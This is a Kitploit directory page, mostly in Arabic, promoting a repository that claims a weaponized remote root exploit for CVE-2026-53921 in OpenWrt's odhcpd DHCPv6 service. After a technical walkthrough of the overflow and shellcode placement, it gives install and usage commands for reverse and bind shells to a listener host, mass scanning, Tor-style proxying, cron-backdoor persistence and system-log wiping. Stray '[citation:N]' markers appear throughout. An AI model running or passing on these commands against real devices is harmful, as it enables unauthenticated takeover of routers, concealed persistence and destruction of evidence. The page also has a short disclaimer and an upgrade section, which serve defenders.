Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – odhcpd Stack Overflow (CVSS 9.8) 🛡️ شرح تفصيلي وشامل للثغرة مع مُتحقِّق واستغلال متعدد لثغرة RCE في DHCPv6 الخاص بـ OpenWrt. تجاوز ثنائي المتجهات (IA_NA/IA_PD) مع شيلكود MIPS/ARM وسلاسل ROP ووكيل SOCKS5 واستمرارية ومسح السجلات ومسح واسع النطاق. استخدمه بأخلاقية، والتزم بالقانون. 🔒 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
أمان الأنظمة المدمجةالاستطلاعأطر الاستغلالأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالالفريق الأحمرتوليد شيفرة القشرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2026-53921 – odhcpd Stack Overflow (CVSS 9.8) 🛡️ شرح تفصيلي وشامل للثغرة مع مُتحقِّق واستغلال متعدد لثغرة RCE في DHCPv6 الخاص بـ OpenWrt. تجاوز ثنائي المتجهات (IA_NA/IA_PD) مع شيلكود MIPS/ARM وسلاسل ROP ووكيل SOCKS5 واستمرارية ومسح السجلات ومسح واسع النطاق. استخدمه بأخلاقية، والتزم بالقانون. 🔒

تطوير الحمولات
استغلال الملفات الثنائية
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

عرض المستودع
6منذ 22 أياملم تتم المراجعة بعد
مشاركة

CVE-2026-53921

CVE-2026-53921 – تجاوز سعة المكدس في odhcpd

CVE CVSS OpenWrt

⚠️ لأغراض تعليمية والاختبار المصرح به فقط. الاستخدام غير المصرح به غير قانوني.


📖 نظرة عامة على الثغرة

CVE-2026-53921 هي ثغرة تجاوز سعة المخزن المؤقت للمكدس حرجة في خدمة odhcpd الخاصة بـ OpenWrt – خادم DHCPv6/DHCPv4/RA الافتراضي.

🔍 كيف تعمل

توجد الثغرة في كود معالجة رسائل DHCPv6 في odhcpd، وتحديداً في الدالتين build_ia() و dhcpv6_ia_handle_IAs().

شرح فني متعمق

1. السبب الجذري

يحدث الخطأ أثناء التسلسل (التغليف) لحزم رد DHCPv6. عندما يستجيب odhcpd لطلبات العملاء، يقوم ببناء الرد في مخزن مؤقت للمكدس بحجم ثابت يبلغ 512 بايت دون فحص مناسب لحدود الذاكرة.

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. إحداث تجاوز سعة المكدس

يرسل المهاجم طلب DHCPv6 (أو Solicit) يحتوي على:

  • 5 خيارات أو أكثر من IA_NA (Identity Association for Non-temporary Address)، يحتوي كل منها على خيار فرعي IAAddress.
  • 22 خيارًا أو أكثر من IA_PD (Identity Association for Prefix Delegation).

يستهلك كل خيار مساحة من المكدس أثناء قيام odhcpd ببناء رده. تتجاوز البيانات المتراكمة 512 بايت، مما يسبب التجاوز.

3. متجهان للتجاوز


المتجه المشغّل نقطة التجاوز


الموقع 1 5 خيارات IA_NA build_ia() لـ IA_NA مع عناوين IPv6

الموقع 2 22 خيار IA_PD build_ia() لـ IA_PD

السبب الجذري متطابق، لكن التجاوز يحدث في مسارات كود مختلفة، مما يجعل كلا المتجهين قابلين للاستغلال بالتساوي.

4. تخطيط الذاكرة

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

يستبدل المهاجم عنوان الإرجاع المحفوظ ليشير إلى كود الشيل الخاص به في الذاكرة.

5. متطلبات الاستغلال


المتطلب الوصف


الوصول إلى الشبكة يجب أن يكون لدى المهاجم اتصال IPv6 بالهدف

المصادقة لا شيء -- هجوم دون مصادقة

الصلاحيات يعمل odhcpd بصلاحيات الجذر (root)، لذا فإن RCE تمنح تحكمًا كاملاً في النظام

الخدمة المستهدفة يجب أن يكون منفذ UDP 547 (DHCPv6) مفتوحًا

6. وضع كود الشيل (Shellcode)

في استغلال حقيقي، يتم وضع كود الشيل الخاص بالمهاجم في حقول عناوين IPv6 الخاصة بـ IAAddress (16 بايت لكل IA_NA). تقوم الحزم المعدّة بتعبئة كود الشيل، ومنحدر NOP، وعنوان الإرجاع في هذه الحقول.

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. سلسلة التأثير

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. متجهات الهجوم مقابل حالة التصحيح

الإصدار الحالة هل RCE ممكن؟


odhcpd < e432dd6 قابل للاستغلال ✅ نعم OpenWrt < 24.10.8 قابل للاستغلال ✅ نعم OpenWrt < 25.12.5 قابل للاستغلال ✅ نعم OpenWrt 24.10.8+ مُصحح ❌ لا OpenWrt 25.12.5+ مُصحح ❌ لا odhcpd master + e432dd6 مُصحح ❌ لا

9. الاستغلال في العالم الحقيقي

هذه الثغرة خطيرة بشكل خاص للأسباب التالية:

  • odhcpd مفعل افتراضيًا على تثبيتات OpenWrt.
  • لا تتطلب أي مصادقة---أي جهاز على نفس قطاع IPv6 يمكنه الهجوم.
  • الخلل في مسار معالجة الطلبات.
  • نادرًا ما تتوفر حمايات Stack Canary و ASLR على أجهزة MIPS/ARM المدمجة.
  • يمكن للاستغلال تجاوز الدفاعات الشائعة في العديد من البيئات المدمجة.

🎯 الإصدارات المتأثرة

المكوّنالإصدارات القابلة للاستغلالتم الإصلاح في
odhcpd (فرع master)قبل الالتزام e432dd6e432dd6 أو أحدث
إصدارات OpenWrt< 24.10.8 < 25.12.5

🧰 الأدوات

يوفر هذا المستودع سكربتين مستقلين:

السكربتالغرضكود الاستغلالالأمان
verifier.pyفحص ثغرات غير تدخلي❌ لا✅ آمن
exploit.pyاستغلال كامل مُسلح✅ نعم⚠️ خطير

🔎 verifier.py – فاحص الثغرات

  • يرسل طلب Solicit قياسيًا لـ DHCPv6 للتحقق من أن الخدمة نشطة.
  • يقرأ لافتات HTTP/SSH لاكتشاف إصدار OpenWrt.
  • يقارن الإصدار مع النطاق المعروف القابل للاستغلال.
  • لا يرسل أي حمولة تجاوز أو كود شيل.

💥 exploit.py – الاستغلال الكامل

  • متجهات تجاوز مزدوجة: IA_NA (Site1) و IA_PD (Site2).
  • كشف تلقائي لبنية المعالج (MIPS / ARM).
  • كود شيل لعكس الاتصال والربط (reverse & bind) بترتيب البايتات الكبير (big‑endian) لـ MIPS.
  • دعم وكيل SOCKS5.
  • استمرارية (باب خلفي عبر cron) ومسح السجلات.
  • فحص مترابط واستغلال جماعي.
  • ترميز اختياري للحمولة (XOR).

🚀 التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 الاستخدام

🔍 الفاحص – التحقق مما إذا كان الهدف قابلًا للاستغلال

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 الاستغلال – الحصول على شل عكسي (لا تستخدمه في نشاط غير قانوني، للاختبار المتقدم فقط)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ خيارات سطر الأوامر

verifier.py

الوسيطالوصف
-u, --targetعنوان IPv6 للهدف (مطلوب)
-i, --ifaceواجهة الشبكة (الافتراضي: eth0)

exploit.py

🧪 سيناريوهات مثال

1. فحص قائمة بالأهداف

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Exploit a single target with bind shell
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. Use SOCKS5 proxy + persistence + log wiping
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ التخفيف

قم بترقية OpenWrt إلى 24.10.8 أو 25.12.5 أو أحدث.

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 المراجع

مصادر رسمية

  • OpenWrt Security Advisory (GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 نشرة تفصيلية تغطي متجهي التجاوز في odhcpd.

  • CVE-2026-53921 NVD Entry https://nvd.nist.gov/vuln/detail/CVE-2026-53921 إدخال قاعدة بيانات الثغرات الرسمية NIST.

  • OpenWrt 24.10.8 Release Notes https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 الإعلان الرسمي عن إصدار الفرع 24.10.

  • OpenWrt 25.12.5 Release Notes https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html الإعلان الرسمي عن إصدار الفرع 25.12.

ثغرات CVE ذات الصلة التي تم إصلاحها في نفس الإصدار

يعالج إصدارا 24.10.8 و 25.12.5 ثغرات odhcpd متعددة تتجاوز CVE-2026-53921 [citation:9]:

تحليلات تقنية ومقالات

  • The Hacker News Analysis https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html تفصيل تقني شامل للثغرة ومتجهات استغلالها. [citation:1]

  • GitHub PoC Repository https://github.com/0xBlackash/CVE-2026-53921 تطبيقات إثبات المفهوم (PoC) العامة وتفاصيل تقنية. [citation:3]

إصلاحات أمنية إضافية في 25.12.5

يعالج الإصدار 25.12.5 أيضًا ثغرات في مكونات أساسية أخرى [citation:10]:

  • uhttpd: تهريب طلبات HTTP (CVE-2026-55612, CVE-2026-55614)
  • LuCI: عدة ثغرات في تصعيد الامتيازات و XSS
  • cgi-io: تجاوز مسار بعد المصادقة
  • Linux Kernel: تم تحديثه إلى 6.12.94 مع ثغرات CVE متعددة
  • OpenSSL: تم تحديثه إلى 3.5.7 لمعالجة العديد من ثغرات CVE
  • Dropbear SSH: تم إصلاح CVE-2019-6111 و CVE-2026-35385

وثائق داعمة

  • OpenWrt Firmware Selector https://firmware-selector.openwrt.org/ حمّل صور البرامج الثابتة المصححة لجهازك.

  • CISA Known Exploited Vulnerabilities Catalog https://www.cisa.gov/known-exploited-vulnerabilities-catalog تحقق مما إذا تمت إضافة CVE-2026-53921 إلى كتالوج KEV (حتى 27 يوليو 2026، غير مُدرجة). [citation:1]

تنزيل الأداة

24.10.8 و 25.12.5
الوسيطالوصف
-u, --targetعنوان IPv6 للهدف
-l, --listملف يحتوي على قائمة بالأهداف
-i, --ifaceواجهة الشبكة (الافتراضي: eth0)
--lhostعنوان IP للمستمع (مطلوب)
--lportمنفذ المستمع (الافتراضي: 4444)
--vectorsite1 أو site2 أو both (الافتراضي: both)
--offsetإزاحة المكدس (الافتراضي: 512)
--retعنوان الإرجاع بالنظام الست عشري (مثل: 0x7ffff000)
--archفرض mips أو arm (كشف تلقائي إذا تم حذفه)
--payloadreverse أو bind (الافتراضي: reverse)
--encodenone أو xor (الافتراضي: none)
--proxy-hostعنوان IP لوكيل SOCKS5
--proxy-portمنفذ وكيل SOCKS5 (الافتراضي: 1080)
--persistenceتثبيت باب خلفي عبر cron
--clear-logsمسح سجل النظام بعد الاستغلال
--scan-onlyفحص الأهداف فقط دون استغلال
--threadsعدد الخيوط للفحص (الافتراضي: 5)
--verboseتسجيل مفصل (Verbose)
CVE IDالخطورةالوصف
CVE-2026-53918عاليةاستخدام بعد التحرير (Use-after-free) في معالج IA الخاص بـ DHCPv6 [citation:4][citation:9]
CVE-2026-53920عاليةكشف ذاكرة المكدس عبر خيار IA_NA/IA_PD مقطوع في DHCPv6 [citation:9]
CVE-2026-53922متوسطةرفض خدمة قبل المصادقة عبر تجاوز حد size_t السفلي (underflow) [citation:9]
CVE-2026-55606متوسطةقراءة زائدة من مخزن المكدس بسبب عدم تطابق ترتيب البايتات في طول DUID [citation:9]
CVE-2026-62948-حقن اسم مضيف في DHCPv6 يؤدي إلى XSS مخزنة [citation:1]
CVE-2026-62947-تجاوز مسار (path traversal) بعد المصادقة في cgi-io [citation:1]